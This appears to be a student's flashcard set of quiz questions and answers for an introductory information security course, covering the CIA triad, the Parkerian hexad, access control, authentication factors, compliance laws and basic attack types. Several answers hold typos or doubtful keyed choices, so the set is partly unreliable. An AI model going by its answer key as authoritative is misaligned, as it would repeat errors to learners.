Fundamentals of Information Security
GLBA
"Graham-Leach-Bliley Act" (Financial Services Modernization Act of 1999) repealed a 1933 law that barred the consolidation of financial institutions and insurance companies. Included within GLBA are multiple sections relating to the PRIVACY of financial information. Companies must provide written notice to consumers of their privacy rights and explain the company's procedures for safeguarding data.
Bell-LaPadula Model
A combination of DAC and MAC, primarily concerned with the confidentiality of the resource. Two security properties define how information can flow to and from the resource: the simple security property and the * property (Can't read higher & can't write lower)
Technical Obsolescence
A product becomes technically obsolete when it is replaced by a better product with more advanced technology.
SSH FTP (SFTP)
A secure version of the File Transfer Protocol that uses a Secure Shell (SSH) tunnel as an encryption method to transfer, access, and manage files.
Honeypots
A seemingly tempting, but bogus target meant to draw hacking attempts. By monitoring infiltration attempts against a honeypot, organizations may gain insight into the identity of hackers and their techniques, and they can share this with partners and law enforcement.
confused deputy problem
A type of attack that is common in systems that use ACLs rather than capabilities. The crux of the confused deputy problem is seen when the software with access to a resource has a greater level of permission to access the resource than the user who is controlling the software. If we, as the user, can trick the software into misusing its greater level of authority, we can potentially carry out an attack
Optical Media
A type of media used to store data which is read by a laser such as a CD or a DVD.
Fuzzer
A type of tool that works by bombarding our applications with all manner of data and inputs from a wide variety of sources, in the hope that we can cause the application to fail or to perform in unexpected ways
Limit user account privileges.
A user runs an application that has been infected with malware that is less than 24 hours old. The malware then infects the operating system. Which safeguard should be implemented to prevent this type of attack?
Vulnerabilities
A weakness that a threat event or the threat agent can take advantage of:
Which form of access control uses CAPTCHAs? A. Attribute base access control. B. Rule based access control. C. Media access control. D. discretionary, access, control
A. Attribute based access control.
What act deals with the online privacy of minors under 13? A. COPPA B. FERPA C. GLBA D. FISMA
A. COPPA
What are two common types of access control list (ACLs)? Choose two answers. A. Filesystem. B. Allow. C. Net work. D. Deny. E. Database system.
A. File system. C. Net work.
What are 3 forms of authentication? A. Four-digit PIN number B. Text of 6-digit number to phone C. Phone number D. Fingerprint E. Account Number F. Username
A. Four-digit PIN number B. Text of 6-digit number to phone D. Fingerprint
Which type of attack category is an attack against confidentiality? A. Interception B. Modification C. Fabrication D. Interruption
A. Interception
Which two types of compliances are laws? A. Privacy Act B. GDPR C. HIPAA D. Least privilege
A. Privacy Act C. HIPAA
Which 2 attributes are included in the concept of risk? Choose 2 answers A. Threats B. Frequency C. Vulnerabilities D. Impacts
A. Threats C. Vulnerabilities
An Example of Symmetric
AES
What is an example of symmetric key encryption?
AES
Clickjacking
An attack that tricks users into clicking something other than what they think they're clicking.
SQL Injection
An attacker issues a SQL command to a web server as part of the URL or as input to a form on a company's website; web server might pass the command onto the database which then allows potentially anything to be done to the database
integrity
An organization plans to encrypt data in transit on a network. Which aspect of data is the organization attempting to protect?
Threats
Any potential occurrence that may cause an undesirable or unwanted outcome for an organization or for a specific asset.
integrity
At a small company, an employee makes an unauthorized data alteration. Which component of the CIA triad has been compromised?
Interception
Attacks allow unauthorized users to access our data, applications, or environments, and are primarily an attack against confidentiality
Interruption
Attacks cause our assets to become unusable or unavailable for our use, on a temporary or permanent basis. Interruption attacks often affect availability but can be an attack on integrity as well.
Fabrication
Attacks involve generating data, processes, communications, or other similar activities with a system. Fabrication attacks primarily affect integrity but could be considered an availability attack as well.
modifcation
Attacks involve tampering with our asset. Such attacks might primarily be considered an integrity attack but could also represent an availability attack.
What is a sandbox? A. A tool only used in Java B. An isolated environment that protects a set of resources. C. Part of VPN connection D. A virtual location to share digital information
B. An isolated environment that protects a set of resources.
A tornado destroyed a data center. Eh I hidden of the CIA triad is most affected? A. Authenticity B. Availability C. Utility D. Integrity
B. Availability
A malicious actor has breached the firewall with a reverse shell. Which side of the CIA triad is most affected? A. Availability B. Confidentially C. Authentication D. Integrity
B. Confidentiality
Which concept refers to adding layers of security to our networks? A. Administrative control depth B. Defense in depth. C. Physical control depth. D. Logical control depth.
B. Defense in depth.
What is an example of identification? A. Text to Cell Phone. B. Employee number C. Update access. D. Fingerprint.
B. Employee number
Which example demonstrates access control? A. Turning the key in the ignition of a car. B. Locking and unlocking the doors of your house. C. Selecting a pin for a new account. D. Changing a bank account password.
B. Locking and unlocking the doors of your house.
Which tool is used for vulnerability assessment? A. Super scan. B. Nessus C. Snort. D. Wire shark.
B. Nessus
Which term is synonymous with asymmetric cryptography? A. Private-Public key pair B. Public key cryptography C. Private key cryptography D. Secret key encryption algorithm
B. Public key cryptography
Which type of compliance is achieved by law? A. Security B. Regulatory C. Industry D. Privacy
B. Regulatory
Which term is synonymous with symmetric cryptography? A. Rivest-Shamir-Adleman encryption algorithm B. Secret Key cryptography C. Public key cryptography D. Private-public key pair
B. Secret Key cryptography
What is an objective for performing an audit? A. To ensure a company can respond effectively to a disaster. B. To ensure compliance and detect misuse. C. To ensure potential risks are identified and analyzed. D. To ensure proper access is granted to resources.
B. To ensure compliance and detect misuse.
Which attribute of the parkerian hexad allows for proper attribution of the owner of a dataset? A. Possession B. Availability C. Authenticity D. Integrity
C. Authenticity
What is the final step in allowing access to resources? A. Identification B. Authentication C. Authorization D. Accountability
C. Authorization
What is an example of identification? A. Voice Pattern B. Write access C. Email Address D. Mother's Maiden Name
C. Email Address
Which method is used to protect data at rest? A. Back up to a disk B. Hashing C. Encryption D. Back up to the cloud
C. Encryption
Which standards apply to any financial entity policies? A. PCI DSS B. ECPI C. Gramm-Leech-Bliley D. SOX
C. Gramm-Leech-Bliley
Which type of compliance is achieved by stakeholder agreement? A. Security B. Regulatory C. Industry D. Privacy
C. Industry
What is the name of the process where the client authenticates the server in the server authenticates the client? A. Token based authentication. B. Mutual authentication. C. Two factor authentication. D. Multi factor authentication.
C. Mutual authentication.
Which combination of factors demonstrates multifactor authentication? A. Fingerprint and voice print B. Password and Pin. C. Password and fingerprint. D. Voice print and weight.
C. Password and fingerprint.
Which phase of the incident response process includes putting the system back better than the original state? A. Post-incident activity. B. Containment. C. Recovery. D. Detection and Analysis
C. Recovery
What element of the parkerian hexad concerned with usefulness? A. Integrity B. Confidentiality C. Utility D. Availability
C. Utility
Flash Drives (portable storage)
Can survive in harsh environments that are subjected to heat, humidity, and magnetic fields.
Parkerian hexad
Confidentiality, Availability, Integrity, Possession, Authenticity, Utility
CIA Triad
Confidentiality, Integrity, Availability
Which type of system is considered absolutely secure? A. A system that is new. B. A system that has been recently patched. C. A system that has been in production for many years. D. A system that is shut off and disconnected from all networks.
D. A system that is shut off and disconnected from all networks.
Which type of access control model is a CAPTCHA an example of? A. Role-based B. Mandatory-based C. Discretionary-based D. Attribute-based
D. Attribute-based
What company audits other companies for licensing requirements? A. BASF B. RCA C. CIA D. BSA
D. BSA
What are two common values for a net work access control list (ACL)? Choose two answers. A. Accept B. Agree C. Disagree. D. Deny. E. Allow.
D. Deny E. Allow
What are hash functions used for? A. Decrypting messages B. Sexuring messages in transport C. Discovering original content D. Determining whether the message has changed
D. Determine whether the message has changed
Which access control model allows access to be determined by the owner of the resource? A. Mandatory access control. B. Attribute based access control. C. Role based access control. D. Discretionary access control.
D. Discretionary access control.
What characteristic falls under accountability? A. Interruption B. Integrity C. Utility D. Identity
D. Identity
A user changes a number in a dataset with a typo. Which side of the CIA Triad is most affected? A. Availability B. Confidentiality C. Authentication D. Integrity
D. Integrity
Which concept of the CIA Triad is associated with reliability? A. Availability B. Confidentiality C. Authentication D. Integrity
D. Integrity (it ensures data has not been tampered with & its correct, authentic, & reliable.
What is an example of authentication? A. Username B. Write Access C. Email Address D. Mother's Maiden Name
D. Mother's Maiden Name
Which factors demonstrate multifactor authentication? A. Vein patterns and iris scan. B. User name and email address. C. Childhood pet and mothers maiden name. D. Mothers maiden name and voice print.
D. Mothers, maiden name, and voice print
What is an example of authentication? A. Username. B. First car. C. Read only. D. Pin
D. Pin
What is an example of identification? A. Fingerprint B. Mothers Maiden Name C. Captcha Tests D. Username
D. Username
An organization employs a VPN to safeguard its information. Which security principle is protected by a VPN?
Data in motion.
Somewhere you are
Geolocation
A company developing and distributing open source applications realizes that attackers are copying the publicly available, open source code and inserting malware into the code. Which type of cryptographic tool should the company use to protect the integrity of its open source applications?
Hash functions
Physical
Hasn't been connected to the interned or other corporate network. This type will secure any software on the computer.
Something you have
ID badge/swipe card/OTP
Which two principles of the CIA triad can be violated by a fabrication attack?
Integrity and availability
Which two principles of the CIA triad can be violated by an interruption attack?
Integrity and availability
MD5
Message Digest 5. A hashing function used to provide integrity. MD5 uses 128 bits. A hash is simply a number created by applying the algorithm to a file or message at different times. The hashes are compared to each other to verify that integrity has been maintained.
Parkerian Hexad- Authenticity
Non authentic or not the same.
Apply the principle of least privilege
Only HR staff can access employee personal information
PCI DSS
Payment Card Industry Data Security Standard, a security standard created by the Payment Card Industry Security Standards Council (PCI SSC)
Firewall
Prevent unauthorized external access to its internal network.
Which asymmetric cryptographic algorithm can provide confidentiality for data in motion?
RSA
Parkerian Hexad- confidentiality
Refers to our ability to protect our data from those who are not authorized to view it.
Which web attack is a server-side attack?
SQL injection
Which web attack is possible due to a lack of input validation?
SQL injection
SSL/TLS
Secure Sockets layer / Transport Layer Security - An encryption layer of HTTP that uses public key cryptography to establish a secure connection.
Parkerian Hexad - Availability
The ability to access our data when we need it.
Parkerian Hexad - Integrity
The ability to prevent people from changing your data in a unauthorized or undesirable manner.
Risk
The likelihood that a threat will occur.
hash function
Types of systems where the user sends a plain text message to another user without a key. They are usually generated based on the message which helps determine whether the integrity of the message has been tampered.
Fuzzer
Which type of tool can be used to detect vulnerabilities in source code related to improper handling of user input?
sniffer
a type of eavesdropping program that monitors information traveling over a network
AES
advanced encryption standard, a symmetric 128-bit block data encryption technique
After considerable research, attackers directed a spear phishing attack at employees at a single bank. One employee opened a message, resulting in a breach that delivered ransomware. Which type of control should be implemented to prevent future spear phishing attacks?
employee training
FISMA
federal info security management act - US law requires federal agencies to create, document and implement security program
Something you are
fingerprint, iris, retina scan
Something you do
handwriting/typing/walking
Which aspect of the CIA triad is violated by an unauthorized database roll back or undo?
integrity
Parkerian Hexad- Utility
refers to how useful the data is to us
SOX
regulates financial data, operations, and assets for publicly held companies
Spear Phishing Attack
targeted attacks against specific companies, organizations or people
Which cybersecurity term is defined as the potential for an attack on a resource?
threat
Symmetric Key Encryption
used a single key to both encrypt the plaintext and decrypt the cipher text.
Something you know
username, password, pin